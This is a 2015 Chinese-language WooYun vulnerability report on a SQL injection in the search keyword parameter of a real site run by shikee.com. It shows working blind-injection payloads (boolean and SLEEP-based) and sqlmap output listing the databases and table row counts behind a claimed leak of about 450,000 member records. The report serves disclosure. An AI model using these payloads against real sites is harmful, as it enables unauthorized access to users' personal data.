当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146950

漏洞标题:试客联盟网众用助手站某处sql注入涉及45W会员信息

相关厂商:shikee.com

漏洞作者: 无名人

提交时间:2015-10-15 16:58

修复时间:2015-10-20 17:00

公开时间:2015-10-20 17:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-15: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

众用助手——国内首家补贴类应用软件分发平台
众用助手基于一站网旗下试客联盟、众划算的试用营销的理念与350万会员,颠覆互联网APP传统的推广模式,开创APP体验营销推广模式。搭建起开发者与真实用户间的分发平台,为广大应用软件开发者提供精准的用户推广和体验营销服务,帮助开发者真正实现精准、有效的推广。

详细说明:

漏洞地址:

http://zhelp.shikee.com/home/search?keyword=a


keword参数存在注入

---
Parameter: keyword (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=a%' AND 4924=4924 AND '%'='
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: keyword=a%' AND (SELECT * FROM (SELECT(SLEEP(5)))yxoY) AND '%'='
---
[14:05:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.10
back-end DBMS: MySQL 5.0.12

漏洞证明:

数据库:

available databases [2]:
[*] information_schema
[*] zhongyongapp


45W+会员信息泄漏

Database: zhongyongapp
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| mobile_app_subsidy_apply_period       | 9189697 |
| mobile_app_subsidy_apply_log          | 7700434 |
| mobile_user_message                   | 5847387 |
| mobile_system_log_hlpay               | 3023412 |
| mobile_app_subsidy_apply              | 1956328 |
| mobile_app_downlog                    | 1316216 |
| mobile_app_subsidy_apply_step         | 778630  |
| mobile_app_subsidy_rebates_pay        | 778431  |
| mobile_members20150601                | 386149  |
| mobile_app_task_apply_log             | 237048  |
| mobile_user_sign_log                  | 171401  |
| mobile_user_device                    | 149860  |
| mobile_user                           | 89294   |
| mobile_app_task_user_share_score      | 84091   |
| mobile_user_invite_reward             | 79963   |
| mobile_app_img                        | 67865   |
| mobile_system_subsidy                 | 62898   |
| mobile_system_subsidy_history         | 61087   |
| mobile_app_task_apply                 | 54780   |
| mobile_app_task_rebates_pay           | 33704   |
| mobile_user_invite                    | 31018   |
| mobile_system_task                    | 19270   |
| mobile_admin_log                      | 15890   |
| mobile_app_log                        | 15181   |
| mobile_system_task_log                | 15129   |
| mobile_sql_log                        | 15104   |
| mobile_task_xls                       | 13879   |
| mobile_app                            | 13860   |
| mobile_user_sign                      | 13744   |
| mobile_app_collection                 | 8038    |
| mobile_user_comment                   | 7006    |
| mobile_app_subsidy_log                | 4699    |
| mobile_user_suggest                   | 4606    |
| mobile_app_subsidy_period             | 3594    |
| mobile_app_subsidy_finance            | 3003    |
| mobile_app_task_log                   | 1896    |
| mobile_user_first_reward              | 1596    |
| mobile_user_extend                    | 1593    |
| mobile_app_task                       | 1157    |
| mobile_app_subsidy                    | 1004    |
| mobile_task_pay                       | 734     |
| mobile_finance_log                    | 643     |
| mobile_user_open                      | 472     |
| mobile_app_subsidy_append             | 467     |
| mobile_user_freeze_log                | 382     |
| mobile_app_special_apply              | 375     |
| mobile_task_img                       | 348     |
| mobile_app_task_option                | 308     |
| mobile_app_category                   | 150     |
| mobile_message_board                  | 119     |
| mobile_task_extend                    | 74      |
| mobile_rebate_failure_log             | 65      |
| mobile_help_img                       | 39      |
| mobile_system_config                  | 37      |
| mobile_app_special                    | 36      |
| mobile_common_session                 | 25      |
| mobile_help_category                  | 24      |
| mobile_help                           | 20      |
| mobile_web_home_advertisement         | 19      |
| mobile_app_home_advertisement         | 12      |
| mobile_app_task_apply_timeout_log     | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1285    |
| SESSION_VARIABLES                     | 445     |
| GLOBAL_VARIABLES                      | 431     |
| GLOBAL_STATUS                         | 341     |
| SESSION_STATUS                        | 341     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219     |
| COLLATIONS                            | 219     |
| STATISTICS                            | 138     |
| PARTITIONS                            | 128     |
| TABLES                                | 128     |
| KEY_COLUMN_USAGE                      | 92      |
| TABLE_CONSTRAINTS                     | 85      |
| PLUGINS                               | 42      |
| CHARACTER_SETS                        | 40      |
| INNODB_FT_DEFAULT_STOPWORD            | 36      |
| PROCESSLIST                           | 23      |
| SCHEMA_PRIVILEGES                     | 18      |
| PARAMETERS                            | 11      |
| ENGINES                               | 9       |
| REFERENTIAL_CONSTRAINTS               | 3       |
| ROUTINES                              | 3       |
| SCHEMATA                              | 2       |
| TRIGGERS                              | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+


1.png


修复方案:

版权声明:转载请注明来源 无名人@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-20 17:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论